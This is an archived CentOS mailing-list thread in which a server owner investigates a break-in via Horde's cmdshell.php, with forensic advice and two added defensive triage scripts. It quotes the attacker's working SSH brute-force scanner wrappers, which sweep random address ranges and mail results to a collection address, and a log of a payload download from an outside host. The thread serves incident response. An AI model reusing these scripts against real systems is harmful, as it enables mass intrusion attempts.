Bruce, you are a f******* genius, man!!!
You were right, bro... thanks for spending the time on this, man...
More info below!
----- Original Message ----
From: bruce <bedouglas@earthlink.net>
To: linuxhousedn@yahoo.com
Sent: Wednesday, June 3, 2009 9:53:24 PM
Subject: RE: [CentOS] Centos 5.3 -> Apache - Under Attack ? Oh hell....
Hi...
I've seen a few of your threads on your issue of the 'atack' processes running from your web server...
I'm replying to you offline, as ......
Take a look over your box, and let's see what you have...
As per your tip, I found a file called 'atack' under the folder /dev/shm/unix, even though I could not locate such a file before. I have now removed that file and am now probing the contents of the /dev/shm/unix folder.
[root@fwgw unix]# pwd
/dev/shm/unix
[root@fwgw unix]# ls -al
total 4352
drwxr-xr-x 2 apache apache     360 Jun  3 23:47 .
drwxrwxrwt 3 root   root        60 Jun  3 00:24 ..
-rwxr-xr-x 1 apache apache       0 May 19 06:02 124.164.find.22
-rwxr-xr-x 1 apache apache       0 Mar 24 22:28 129.135.find.22
-rwxr-xr-x 1 apache apache       0 Mar 24 22:25 129.find.22
-rwxr-xr-x 1 apache apache       0 May 25 13:54 21.168.find.22
-rwxr-xr-x 1 apache apache   12687 May 25 06:16 60.191.find.22
-rw-r--r-- 1 apache apache       0 Jun  3 23:45 83.182.find.22
-rwxr-xr-x 1 apache apache    4631 Apr 21 17:50 84.2.find.22
-rwxr-xr-x 1 apache apache       0 May 25 06:17 89.38.find.22
-rwxr-xr-x 1 apache apache    2362 May 19 15:28 91.204.find.22
-rwxr-xr-x 1 apache apache     216 May 18  2005 auto
-rwxr-xr-x 1 apache apache 4374933 May 15 19:41 data.conf
-rwxr-xr-x 1 apache apache   15729 Oct 14  2005 find
-rw-r--r-- 1 apache apache    5262 Jun  3 23:45 log
-rwxr-xr-x 1 apache apache     751 May 25 06:33 unix
-rw-r--r-- 1 apache apache       0 Jun  3 23:04 vuln.txt
-rwxr-xr-x 1 apache apache     671 May 25 13:56 x
The contents of file 'x' are (Romanian strings glossed in comments):
#!/bin/bash
echo "[+] PLM prea destept pentru voi : Yuli [+]"      # Romanian, vulgar: roughly "screw you, too smart for you : Yuli"
X=0
c=0
while [ $X -le 255 ]                                   # 256 passes, each against a random /16 inside the /8 given as $1
do
  c=$RANDOM
  let "c %= 255"
  echo "[+] Scanam radom class b $1.$c [+]"            # "Scanning random class B $1.$c"
  ./find $1.$c 22                                      # port-22 sweep of $1.$c.0.0/16; hits go to $1.$c.find.22
  sleep 10
  cat $1.$c.find.22 |sort |uniq > ip.conf
  oopsnr2=`grep -c . ip.conf`                          # number of hosts answering on port 22
  echo "[+] Incepe partea cea mai misto :D"            # "Now the fun part :D"
  echo "[+] Doar $oopsnr2 de servere. Exista un inceput pt. toate !"   # "Only $oopsnr2 servers. Everything has a beginning!"
  echo "[=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=]"
  echo "[+] Incepem sa vedem cate server putem sparge" # "Let's see how many servers we can crack"
  ./atack 100 >> log                                   # the brute-force binary (what the "100" means is not shown on the page)
  mail -s $1.$c yuli1989xxx@yahoo.com < log            # results mailed to the collection address, subject = the /16
  rm -rf $1.$c.find.22 ip.conf
  echo "[+] Scanner a terminat de scanat !"            # "Scanner finished scanning!"
  echo "[+] Next random class b !"
  X=$((X+1))
done                                                   # the closing "done" was cut off in the pasted copy
The contents of the file 'unix' are:
#!/bin/bash
if [ $# != 1 ]; then
  echo "[+] Folosim : $0 [b class]"                    # "Usage: $0 [B class]"
  exit;
fi

echo "[+][+][+][+][+] UnixCoD Atack Scanner [+][+][+][+][+]"
echo "[+] SSH Brute force scanner : user & password [+]"
echo "[+] Undernet Channel : #yuli [+]"
echo "[+][+][+][+][+][+][+] ver 0x10 [+][+][+][+][+][+][+]"
./find $1 22                                           # port-22 sweep of the /16 given as $1; hits go to $1.find.22
sleep 10
cat $1.find.22 |sort |uniq > ip.conf
oopsnr2=`grep -c . ip.conf`                            # number of hosts answering on port 22
echo "[+] Incepe partea cea mai misto :D"              # "Now the fun part :D"
echo "[+] Doar $oopsnr2 de servere. Exista un inceput pt. toate !"   # "Only $oopsnr2 servers. Everything has a beginning!"
echo "[=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=][=]"
echo "[+] Incepem sa vedem cate server putem sparge"   # "Let's see how many servers we can crack"
./atack 100                                            # the brute-force binary, run after ip.conf has been written
rm -rf $1.find.22 ip.conf
echo "[+] UnixCoD Scanner a terminat de scanat !"      # "UnixCoD Scanner finished scanning!"
The contents of 'auto' are (note that 'assh', which it invokes, is not in the listing above):
#!/bin/sh
echo
echo "Enter A class range"
read brange
echo "Enter output file"
read file
crange=0
while [ $crange -lt 255 ] ; do                         # one "./assh A.B ;" command per /16 in the given /8
  echo -n "./assh $brange.$crange ; " >> $file
  let crange=crange+1
done
The contents of 'log' are:
[+] No SSH ->www:www:83.246.113.34
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]      (this banner line repeated 15 times)
[+] No SSH ->www:www:83.246.119.41
[+] UnixCoD Atack 2005 ver 0x10 [ Made By : Ghost Kilah ]      (this banner line repeated 10 times)
Further googling indicates that UnixCoD is a brute-force SSH scanner... What is odd is that I have fail2ban running (which blocks IPs after 2 failed attempts) and an 8-letter password, but I still got hacked....
Guys... any comments....
And once again, thanks Bruce!!!
Regards, Marco.
So you're going to need to figure out what the hole in your system is/was... you're going to need to patch it... you're going to need to examine the logs for logins to your other systems, as well as examine the ssh logs for outgoing login attempts from the hacked box to other boxes in your network...
If the other boxes in your network have webservers that are exposed to the net, you're going to have to examine them as well...
You're going to have to check for other files (/dev/shm, etc.) on the other boxes...
But in all probability, you should reinstall on the initial box, once you've resolved how to correct the issue... (this includes analyzing the webserver apps!!!)
good luck!
On Wed, 2009-06-03 at 09:33 -0700, Linux Advocate wrote:
<snip>
[root@fwgw unix]# pwd
/dev/shm/unix
<snip>
Note that /dev/shm is a tmpfs file system. It will be dynamically populated. I would expect the attack vector still resides on your system somewhere else.
----- Original Message ----
From: William L. Maltby <CentOS4Bill@triad.rr.com>
To: CentOS mailing list <centos@centos.org>
Sent: Thursday, June 4, 2009 12:56:22 AM
Subject: Re: [CentOS] Centos 5.3 -> Apache - Under Attack ? Oh hell....
Note that /dev/shm is a tmpfs file system. It will be dynamically populated. I would expect the attack vector still resides on your system somewhere else.
I'm looking for it, bro... the machine is disconnected from the net but I have not formatted it yet... I really need to know how it happened....
Hi,
On Sat, Jun 13, 2009 at 03:19, Linux Advocate <linuxhousedn@yahoo.com> wrote:
I'm looking for it, bro... the machine is disconnected from the net but I have not formatted it yet... I really need to know how it happened....
I suggest you start by looking at Apache's logs. Look for very strange URLs that have nothing to do with the applications you have there, like .exe files (IIS attacks) or other .cgi or .php files that will give you 404 errors. Also look for things in the error_log file. And then look for other accesses from the same IP (assuming it's always from the same IP) to files that do exist; this will probably lead you to what was used to break in. Continue the investigation from there.
Also, you can use "stat /dev/shm/unix" to find the "ctime" of that directory, or look into the modification time of "/dev/shm" to try to figure out when the "/dev/shm/unix" directory was created. Then you can look for accesses at that time in your Apache logs to figure out which script was used for the break-in.
Usually script kiddies will run a series of attacks on your machine, which will generate logs with errors. Unless the attacker got root access (which apparently he did not, as he was running his program as user apache) he would not be able to delete logs, so the evidence should still be there.
HTH, Filipe
Replies below...
----- Original Message ----
From: Filipe Brandenburger <filbranden@gmail.com>
To: CentOS mailing list <centos@centos.org>
Sent: Saturday, June 13, 2009 9:58:51 PM
Subject: Re: [CentOS] Centos 5.3 -> Apache - Under Attack ? Oh hell....
I suggest you start by looking at Apache's logs,
Filipe, good idea. Will do.
look for very strange URLs that have nothing to do with the applications you have there, like .exe files (IIS attacks) or other .cgi or .php files that will give you 404 errors. Also look for things in the error_log file. And then look for other accesses from the same IP (assuming it's always from the same IP) to files that do exist; this will probably lead you to what was used to break in. Continue the investigation from there.
A. I have found a suspicious IP around the dates (based on the dates of the files in the atack folder) when I think this break-in could have happened:
86.126.71.74 <--- from Romania (I am in Singapore)
This IP seemed to have generated the most error messages. There are other not-from-my-country IPs, but with way, way fewer errors from them.
There are many error messages (generated by 86.126.71.74) in the Apache error log, as below:
[Mon May 18 05:39:39 2009] [error] [client 86.126.71.74] PHP Warning: Cannot modify header information - headers already sent in Unknown on line 0, referer: http://ip.of.machine.i.removed.for.this.post/horde/admin/cmdshell.php
./x: line 19: log: No such file or directory
[Tue May 19 02:27:32 2009] [error] [client 86.126.71.74] PHP Warning: Cannot modify header information - headers already sent in Unknown on line 0, referer: http://60.54.174.146/horde/admin/cmdshell.php?Horde=e20jlll1ds0eudvsdqrsrbb7...
[Thu May 21 19:29:52 2009] [error] [client 80.179.16.201] script '/var/www/html/sys_to_server.php' not found or unable to stat
http://60.54.174.146/horde/admin/cmdshell.php?Horde=f49bd7r2sb0ut885k3t5vq0n...
cat: vuln.txt: No such file or directory
<--- this vuln.txt is in the /dev/shm/unix/atack folder and also in the /var/tmp/unix/atack folder. Was the attacker looking for this file and then planting it later, or something like that?
[Wed May 27 12:20:28 2009] [error] [client 86.126.71.74] PHP Warning: Cannot modify header information - headers already sent in Unknown on line 0, referer: http://60.54.174.146/horde/admin/cmdshell.php
Len 255 < 256      (repeated 19 times)
What does "Len 255 < 256" indicate? Some kind of buffer overflow?
B. Can I conclude that the attacker came through the Horde framework (cmdshell.php)? The Horde framework was installed from the CentOS repo.....!!!
[root@fwg]# yum info horde
Name    : horde
Arch    : noarch
Version : 3.1.7
Release : 1.el5.centos
Size    : 18 M
Repo    : installed
Summary : The common Horde Framework for all Horde modules.
URL     : http://www.horde.org/
There are some Google hits on cmdshell.php being used to execute arbitrary commands. There is some exploit called "CmdShell.Horde.ExploitCheck.Decoy"; I haven't found more info yet. Any tips on this would be most welcome.
There is also this line in the error log;
[Fri May 22 18:26:56 2009] [notice] SELinux policy enabled; httpd running as context system_u:system_r:httpd_t
Is the line above normal?
C. BUT THE WORST THING OF ALL IS THESE LINES BELOW....
[Mon May 25 14:46:50 2009] [error] [client 86.126.71.74] PHP Warning: Cannot modify header information - headers already sent in Unknown on line 0, referer: http://my.machine.ip.again/horde/admin/cmdshell.php?Horde=7blkurngfdeqsgorrk...
--14:47:00-- http://mv.do.am/unix.tgz
Rezolvare mv.do.am... 208.100.61.101                     [Resolving mv.do.am...]
Connecting to mv.do.am|208.100.61.101|:80... conectat.   [connected]
Cerere HTTP trimisă, se aşteaptă răspuns... 200 OK        [HTTP request sent, awaiting response... 200 OK]
Dimensiune: 1614224 (1,5M) [application/octet-stream]     [Length: 1614224 (1.5M)]
Saving to: `unix.tgz'
(wget progress bar omitted: about 1.5 MB received over 45 s at 13-57 KB/s)
14:47:47 (35,1 KB/s) - `unix.tgz' saved [1614224/1614224]
DID THIS GUY ACTUALLY SAVE A FILE ON MY HARD DISK??? AAAAAAHHHHHHHHHHHHHHHHHHHH???????????????
Was this why rkhunter popped up with this warning?
* Filesystem checks
    Checking /dev for suspicious files...    [ OK ]
    Scanning for hidden files...             [ Warning! ]
---------------
/etc/.pwd.lock
/usr/share/man/man1/..1.gz
/dev/.udev
---------------
Please inspect:
/usr/share/man/man1/..1.gz (gzip compressed data, from Unix, max compression)
/dev/.udev (directory)
Should I delete these files? Are the man files normally .gz or .bz2?
There is also a similar entry where another file, called unix2.tgz, was downloaded....
But I can't find these files on the hard disk. Guys, I am out of my league here. All assistance is deeply appreciated.
Linux Advocate wrote:
DID THIS GUY ACTUALLY SAVE A FILE ON MY HARD DISK??? AAAAAAHHHHHHHHHHHHHHHHHHHH???????????????
Was this why rkhunter popped up with this warning?
- Filesystem checks
    Checking /dev for suspicious files...    [ OK ]
    Scanning for hidden files...             [ Warning! ]
/etc/.pwd.lock
/usr/share/man/man1/..1.gz
/dev/.udev
Please inspect:
/usr/share/man/man1/..1.gz (gzip compressed data, from Unix, max compression)
/dev/.udev (directory)
Should I delete these files? Are the man files normally .gz or .bz2?
There is also a similar entry where another file, called unix2.tgz, was downloaded....
But I can't find these files on the hard disk. Guys, I am out of my league here. All assistance is deeply appreciated.
I *hope* this machine is disconnected from the internet and running a live CD to investigate this.
Yes, it appears you've been hacked, and have stealth files (any file with . in front of the name is hidden and would only show with ls -a), and if you *are* rootkitted, there's a strong possibility your ls and other command tools have been replaced..
And it appears it came in via an exploit in that Horde framework (I know nothing about Horde).
John, replies below...
I *hope* this machine is disconnected from the internet and running a live CD to investigate this.
Yes. But I haven't formatted it yet because I need to understand what happened... I still can't believe a CentOS box that was regularly updated and patched was hacked.
Yes, it appears you've been hacked, and have stealth files (any file with . in front of the name is hidden and would only show with ls -a), and if you *are* rootkitted, there's a strong possibility your ls and other command tools have been replaced..
I don't think the attacker got root ownership, or else the log files would have been altered or deleted.
And it appears it came in via an exploit in that Horde framework (I know nothing about Horde).
Hopefully more members on the list will weigh in on this.
Linux Advocate wrote:
/etc/.pwd.lock /usr/share/man/man1/..1.gz /dev/.udev
Please inspect: /usr/share/man/man1/..1.gz (gzip compressed data, from Unix, max compression) /dev/.udev (directory)
Actually, I just checked on another system; those files appear to be normal.
Google for Horde exploits, and you will see there are some that look very much like those Apache log entries you saw.
On 6/14/09, Linux Advocate <linuxhousedn@yahoo.com> wrote:
<snip>
Yes. But I haven't formatted it yet because I need to understand what happened... I still can't believe a CentOS box that was regularly updated and patched was hacked.
In addition to the regular updates you make to the box, there are things you can do to "harden" the security. That will make it tougher for someone to hack. You can begin with the manual you can download from nsa.gov or other documentation. However, please do not believe that you can make the box impossible to hack. A hardened box will discourage the majority of hackers and they will go elsewhere. GL
B. Can I conclude that the attacker came through the Horde framework (cmdshell.php)? The Horde framework was installed from the CentOS repo.....!!!
C. BUT THE WORST THING OF ALL IS THESE LINES BELOW....
<snip>
14:47:47 (35,1 KB/s) - `unix.tgz' saved [1614224/1614224]
To answer B & C, I'm reasonably certain that the answer to both is yes. I got curious, so I downloaded the file at http://mv.do.am/unix.tgz into a secured area of my computer. I was surprised the hacker hasn't moved on, but it contains the files you identified sitting in /dev/shm/unix.
It looks to me like the hacker exploited a weakness in Horde's cmdshell.php to upload the file "unix.tgz" to /dev/shm, then unpacked it and off he/she went.
Going forward I would recommend, after doing a wipe & reinstall, investigating putting Apache into a chroot jail and hardening PHP using Suhosin/hardened-php or the like. The jail will limit the damage a hacker can do when they break in, and Suhosin will make it harder for them to do so.
<snip>
B. Can I conclude that the attacker came through the Horde framework (cmdshell.php)? The Horde framework was installed from the CentOS repo.....!!!
I don't think the horde set on CentOS is very current. I just used the tarball from the horde website, and I keep it current.
...(cmdshell.php)? The Horde framework was installed from the CentOS repo.....!!!
I don't think the Horde set on CentOS is very current. I just used the tarball from the Horde website, and I keep it current.
OK. It's just that, with CentOS being a Red Hat clone and so on, all the RPMs they use are supposed to have been 'vetted', right.... But anyway... it's a lesson learnt.
Linux Advocate wrote:
OK. It's just that, with CentOS being a Red Hat clone and so on, all the RPMs they use are supposed to have been 'vetted', right.... But anyway... it's a lesson learnt.
Security and bug fixes are backported to the RH/CentOS releases as they are found. But you have to run yum to apply them to your system as they become available, because everyone knows the flaws as soon as they are published.
On 6-16-2009 10:26 PM Linux Advocate spake the following:
OK. It's just that, with CentOS being a Red Hat clone and so on, all the RPMs they use are supposed to have been 'vetted', right.... But anyway... it's a lesson learnt.
I think the Horde stuff is in extras or plus, and not maintained AFAIK.
Thanks guys. Let's close this thread. Bye.
On Sat, 2009-06-13 at 00:19 -0700, Linux Advocate wrote:
<snip>
Note that /dev/shm is a tmpfs file system. It will be dynamically populated. I would expect the attack vector still resides on your system somewhere else.
I'm looking for it, bro... the machine is disconnected from the net but I have not formatted it yet... I really need to know how it happened....
Have you run rpm with --verify? You'll need to add another option or two to get it to give more verbose information.
It occurred to me too that finding files not provided by any package might give some clues (although most of what it may return will not be problems). If you get a list of all files (use find so even "hidden" ones appear) and then use rpm to find out --whatprovides, you should get a bunch: some user files and a few not-user files. These become candidates for further inspection. There's always going to be a few that are not from a package but are OK.
Good luck on your detecting.
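As an added example (not from the thread or any poster): shell helpers for the two checks suggested above, the rpm verify pass and the hunt for files no package owns. It assumes an RPM-based box with GNU find/xargs and an rpm binary you trust; the file-to-package query is `rpm -qf` (`--whatprovides` answers a different question, which package supplies a capability). The only input used here is constructed `rpm -Va` / `rpm -qf` output fed to the parsing functions, so it runs anywhere; the live commands for the compromised box are shown in comments.

```bash
#!/bin/bash
# Package-integrity triage for an RPM-based box (added example, not from the thread).
# Assumptions: GNU find/xargs and an rpm binary you trust. If the box may be
# rootkitted, boot a live CD and point rpm at the mounted disk (rpm --root /mnt ...)
# instead of trusting the suspect system's own rpm, ls and find.

# Keep the interesting lines of `rpm -Va` output. Each line is
#   <flags> [c|d|g|l|r] <path>
# where a "5" in the flags means the digest differs from the package's copy and
# the word "missing" means the file is gone. Config (c) and doc (d) files change
# legitimately, so they are skipped; a modified /bin/ls or /usr/bin/find is not.
filter_verify() {            # stdin: output of `rpm -Va`
    awk '
        $1 == "missing"                     { print "missing  " $NF; next }
        NF == 3 && ($2 == "c" || $2 == "d") { next }
        $1 ~ /5/                            { print "modified " $NF }
    '
}

# Extract the paths from `rpm -qf` output; unowned files are reported as
#   file /some/path is not owned by any package
# and owned ones print just the package name, which is dropped.
parse_unowned() {            # stdin: output of `rpm -qf FILE...`
    sed -n 's/^file \(.*\) is not owned by any package$/\1/p'
}

# Regular files under the given directories that no package claims.
# -xdev keeps find on one filesystem, so separate mounts (tmpfs such as
# /dev/shm, a separate /var or /tmp) must be listed explicitly; those are
# exactly where this thread's kit was found (/dev/shm/unix, /var/tmp/unix).
unowned_files() {            # unowned_files DIR...
    find "$@" -xdev -type f -print0 2>/dev/null \
        | xargs -0 rpm -qf 2>/dev/null \
        | parse_unowned
}

# On the compromised box (not run here):
#   rpm -Va 2>/dev/null | filter_verify
#   unowned_files /bin /sbin /lib /usr /etc /dev/shm /var/tmp /tmp

# Constructed sample output (not a real capture), so the parsers can be exercised:
sample_verify_output() {
    printf '%s\n' \
        'S.5....T    /bin/ls' \
        'S.5....T  c /etc/motd' \
        'missing     /usr/bin/top' \
        '..5....T  d /usr/share/doc/foo/README'
}
sample_qf_output() {
    printf '%s\n' \
        'file /var/tmp/unix/x is not owned by any package' \
        'coreutils-5.97-19.el5' \
        'file /dev/shm/unix/atack is not owned by any package'
}

echo "== rpm -Va, filtered =="; sample_verify_output | filter_verify
echo "== unowned files ==";     sample_qf_output | parse_unowned
```

The filter deliberately keeps only digest mismatches and missing files; `rpm -Va` also flags mode, owner and mtime differences, which are worth a second pass once the obvious replacements (ls, find, ps, netstat, sshd) have been ruled out.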
Further googling indicates that UnixCoD is a brute-force SSH scanner... What is odd is that I have fail2ban running (which blocks IPs after 2 failed attempts) and an 8-letter password, but I still got hacked....
Hi Marco,
Just because the app is an SSH scanner doesn't automatically mean they broke in through SSH.
As has been mentioned a few times, the most likely vector of attack/compromise on your machine was through an app/script of some sort running on your website. Any of the apps you mentioned in an earlier post is suspect in this case.
The directory is user:group apache:apache... so check your Apache logs.... Go over your Apache logs with a fine-toothed comb. Specifically look for: file timestamps that match files in the directory (May 25 13:56), and POST requests; this will usually very quickly show you the requests and the web app hole. After finding the hole/IP, search your Apache logs for all requests from that IP address.
Once things have slowed down, be a good netizen and contact yahoo.com abuse to let them know about the collection email account.
PS: take a deep breath, it's not the end of the world.
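As an added example (not from the thread or any poster) serving both Filipe's advice earlier (strange URLs and 404s, error_log entries, then everything from the same IP, tied to the ctime/mtime of /dev/shm/unix) and the checklist in this reply (file timestamps, POSTs, then all requests from the IP): shell helpers over the default combined access_log and error_log formats of CentOS 5's httpd. The log lines at the bottom are constructed for the demo, modelled on the entries Marco posted; the log paths and the GNU `date -r` call are assumptions noted in the comments.

```bash
#!/bin/bash
# Apache log triage helpers (added example, not from the thread).
# Assumes the "combined" access_log format CentOS 5's httpd ships by default:
#   IP - - [DD/Mon/YYYY:HH:MM:SS zone] "METHOD path proto" status bytes "referer" "agent"
# and error_log lines carrying "[client IP]".

# Requests whose timestamp begins with a prefix such as 25/May/2009:13:5 .
# Derive the prefix from the dropped file's mtime (assumes GNU date):
#   date -r /dev/shm/unix/x '+%d/%b/%Y:%H:%M'
# then widen or narrow the prefix until the window is small but not empty.
requests_at() {          # requests_at ACCESS_LOG TIMEPREFIX
    awk -v p="$2" 'index($4, "[" p) == 1' "$1"
}

# Every POST. A webmail/admin box gets few legitimate POSTs to scripts you
# did not write; POSTs to a "cmdshell" or upload script stand out immediately.
post_requests() {        # post_requests ACCESS_LOG
    awk '$6 == "\"POST"' "$1"
}

# Clients ranked by 404 count: scanners probing for .exe/.cgi/.php paths that
# do not exist on this server float to the top.
clients_by_404() {       # clients_by_404 ACCESS_LOG
    awk '$9 == 404 { print $1 }' "$1" | sort | uniq -c | sort -rn
}

# Clients ranked by how many error_log entries name them.
clients_by_errors() {    # clients_by_errors ERROR_LOG
    sed -n 's/.*\[client \([0-9.]*\)\].*/\1/p' "$1" | sort | uniq -c | sort -rn
}

# Everything one client did, once the IP is known.
all_from_ip() {          # all_from_ip ACCESS_LOG IP
    awk -v ip="$2" '$1 == ip' "$1"
}

# Constructed sample logs (not real captures), shaped like the thread's entries.
write_sample_access_log() {   # write_sample_access_log FILE
    cat > "$1" <<'EOF'
86.126.71.74 - - [18/May/2009:05:39:39 +0800] "POST /horde/admin/cmdshell.php HTTP/1.1" 200 1200 "-" "Mozilla/4.0"
80.179.16.201 - - [21/May/2009:19:29:52 +0800] "GET /sys_to_server.php HTTP/1.1" 404 291 "-" "libwww-perl/5.805"
80.179.16.201 - - [21/May/2009:19:30:01 +0800] "GET /cmd.exe HTTP/1.1" 404 291 "-" "libwww-perl/5.805"
86.126.71.74 - - [25/May/2009:13:55:41 +0800] "GET /horde/admin/cmdshell.php HTTP/1.1" 200 4123 "-" "Mozilla/4.0"
86.126.71.74 - - [25/May/2009:13:56:02 +0800] "POST /horde/admin/cmdshell.php HTTP/1.1" 200 5331 "-" "Mozilla/4.0"
10.0.0.5 - - [25/May/2009:13:56:10 +0800] "GET /index.html HTTP/1.1" 200 612 "-" "Mozilla/5.0"
EOF
}
write_sample_error_log() {    # write_sample_error_log FILE
    cat > "$1" <<'EOF'
[Mon May 18 05:39:39 2009] [error] [client 86.126.71.74] PHP Warning:  Cannot modify header information - headers already sent in Unknown on line 0, referer: http://192.0.2.10/horde/admin/cmdshell.php
[Thu May 21 19:29:52 2009] [error] [client 80.179.16.201] script '/var/www/html/sys_to_server.php' not found or unable to stat
[Wed May 27 12:20:28 2009] [error] [client 86.126.71.74] PHP Warning:  Cannot modify header information - headers already sent in Unknown on line 0, referer: http://192.0.2.10/horde/admin/cmdshell.php
EOF
}

# Demo run (the real logs live under /var/log/httpd/ on CentOS 5).
tmp=$(mktemp -d)
write_sample_access_log "$tmp/access_log"
write_sample_error_log  "$tmp/error_log"
echo "== requests around the file's mtime (25 May 13:5x) =="; requests_at "$tmp/access_log" 25/May/2009:13:5
echo "== POST requests ==";                                   post_requests "$tmp/access_log"
echo "== clients by 404s ==";                                 clients_by_404 "$tmp/access_log"
echo "== clients by error_log entries ==";                    clients_by_errors "$tmp/error_log"
echo "== everything from the top client ==";                  all_from_ip "$tmp/access_log" 86.126.71.74
rm -r "$tmp"
```

On the sample data the time window, the POST filter and the error_log ranking all converge on the same client and the same script, which is the pattern to look for on the real logs: one IP, one script, requests clustered around the minute the dropped files were written. Note that a 404-heavy client (the `libwww-perl` scanner here) is often a different party from the one who actually got in, so rank by all three views rather than by 404s alone.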